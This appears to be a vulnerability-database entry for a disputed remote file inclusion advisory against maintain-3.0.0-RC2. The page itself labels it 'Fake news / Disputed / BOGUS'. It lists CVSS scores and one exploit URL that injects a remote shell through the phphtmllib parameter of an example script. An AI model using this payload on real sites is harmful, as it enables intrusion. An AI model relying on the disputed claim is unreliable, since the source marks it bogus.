maintain-3.0.0-RC2 - Remote File Include Vulnerabilities

WARNING! Fake news / Disputed / BOGUS

maintain-3.0.0-RC2 - Remote File Include Vulnerabilities

2007-03-08 / 2007-03-09

Credit: ERNE & The_Bekir

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-7120

CWE: CWE-Other

CVSS Base Score: 10/10

Impact Subscore: 10/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

# ERNE ---- ERNEALiZM ---- The_Bekir ----
# maintain-3.0.0-RC2 - Remote File Include Vulnerabilities
# site : Www.Hack-Medya.Org & Www.SavSak.Com
# Script : ftp://ftp.osuosl.org/pub/osl/maintain/maintain-3.0.0-RC2.tar.gz
# Credits : ERNE & The_Bekir
# Contact : erne (at) ernealizm (dot) com [email concealed]
# Thanks : BlackWhite, D3ngszn, Di_Lejyoner, Xoron
# Vulnerable :
http://www.site.com/[path]/lib/php/phphtmllib-2.5.4/examples/example6.ph
p?phphtmllib=[shell]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

maintain-3.0.0-RC2 - Remote File Include Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.